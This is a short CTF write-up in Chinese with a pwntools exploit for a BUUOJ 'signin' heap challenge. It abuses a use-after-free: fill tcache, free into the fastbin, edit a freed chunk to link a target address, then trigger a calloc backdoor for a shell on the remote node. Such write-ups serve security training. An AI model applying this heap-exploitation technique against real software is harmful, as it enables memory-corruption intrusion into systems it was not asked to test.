漏洞: UAF (use-after-free)
新知识:
calloc 函数会直接绕过 tcache 从 fastbin 中取 chunk;后门函数中又调用 calloc 分配内存并向其中写入数据 1,所以我们只需要把 target 的地址链入 fastbin 即可 getshell
exp:
from pwn import *
from LibcSearcher import *
# Paths to the challenge binary and the libc it is run against. The remote
# libc line was left commented out by the author and is not referenced below.
local_file = "./signin"
local_libc = "./libc-2.27.so"
# remote_libc = './libc-2.23.so'

# pwntools global settings: verbose tube logging, and a tmux split for gdb.
context.log_level = "debug"
context.terminal = ["tmux", "splitw", "-h"]

# Load the binary once so the architecture can be taken from it.
e = ELF(local_file)
context.arch = e.arch
# Target selection: 0 runs the binary locally under pwntools, any other value
# talks to the remote service. Both modes use the same local libc copy for
# symbol lookup, so it is loaded once after the tube is created.
select = 1
if select == 0:
    r = process(local_file)
else:
    r = remote('node4.buuoj.cn', 28883)
libc = ELF(local_libc)
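# Thin forwarding helpers over the pwntools tube `r` (bound by the
# process/remote selection above) so the interaction code stays short.
# Each returns whatever the underlying tube method returns.
def se(data):
    """Send `data` as-is, without a trailing newline."""
    return r.send(data)


def sa(delim, data):
    """Receive until `delim` has been seen, then send `data`."""
    return r.sendafter(delim, data)


def sl(data):
    """Send `data` followed by a newline."""
    return r.sendline(data)


def sla(delim, data):
    """Receive until `delim` has been seen, then send `data` plus a newline.

    The original spelled the tube method ``slafter``, which does not exist
    on a pwntools tube and would raise AttributeError on first use; the
    actual method is ``sendlineafter``.
    """
    return r.sendlineafter(delim, data)


def sea(delim, data):
    """Alias of `sa`, kept because the file defines both names."""
    return r.sendafter(delim, data)


def rc(numb=4096):
    """Receive up to `numb` bytes."""
    return r.recv(numb)


def rl():
    """Receive one line."""
    return r.recvline()


def ru(delims):
    """Receive until `delims` has been seen and return everything read."""
    return r.recvuntil(delims)


def uu32(data):
    """Receive until `data`, then unpack the last 4 bytes as a little-endian u32."""
    return u32(ru(data)[-4:].ljust(4, b'\0'))


def uu64(data):
    """Receive until `data`, then unpack the last 6 bytes (zero-padded to 8) as a u64.

    Six bytes is the usual width of a leaked user-space pointer on x86-64.
    """
    return u64(ru(data)[-6:].ljust(8, b'\0'))


def info_addr(tag, addr):
    """Log `addr` as `tag: 0x...` through the tube's logger."""
    return r.info(tag + ': {:#x}'.format(addr))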
def dbg():
    """Attach gdb to the tube `r` and pause until the user resumes.

    Debugging aid only; it is not called by the visible exploit sequence.
    """
    gdb.attach(r)
    pause()
# Prompt string the challenge prints before reading a menu choice; every
# helper below waits for it before sending its option number.
menu = "your choice?"
def add(index):
    """Select menu option 1 and allocate into slot `index`.

    The index is sent as decimal text after the program's `idx?` prompt.
    """
    sa(menu, '1')
    slot = str(index)
    sa('idx?', slot)
def edit(index, content):
    """Select menu option 2 and write `content` into slot `index`.

    `content` is sent with a trailing newline. Note that nothing on the
    client side checks whether the slot was already freed; the exploit
    sequence below relies on the program accepting such an edit (the UAF).
    """
    sa(menu, '2')
    slot = str(index)
    sa('idx?', slot)
    sl(content)
def delete(index):
    """Select menu option 3 and free slot `index`."""
    sa(menu, '3')
    slot = str(index)
    sa('idx?', slot)
# Fixed addresses taken from the challenge binary (the 0x404xxx range looks
# like non-PIE .bss, not verified here). Only `target` is referenced by the
# visible exploit sequence; the others are kept for reference.
chunk_ptr = 0x4040e0
target = 0x4040c0
flag = 0x404160
edit_cnt = 0x4040bc
add_cnt = 0x404088
# Exploit sequence. Eight slots are allocated and then freed in order; per
# the note above the backdoor's calloc is served from the fastbin rather than
# tcache, so the 7-vs-1 split is presumably the tcache fill count (confirm
# against the libc version). Slot 7 is then edited *after* it was freed —
# that is the UAF — which per the note links `target` (minus a presumed
# 0x10 chunk-header offset) into the fastbin. A correct program would null
# the slot pointer on free and refuse edits of freed slots, which removes
# this primitive.
slots = range(8)
for i in slots:
    add(i)
for i in slots:
    delete(i)
add(8)
edit(7, p64(target - 0x10))
# Option 6 is sent last, presumably the backdoor path described in the note.
sa(menu, '6')
r.interactive()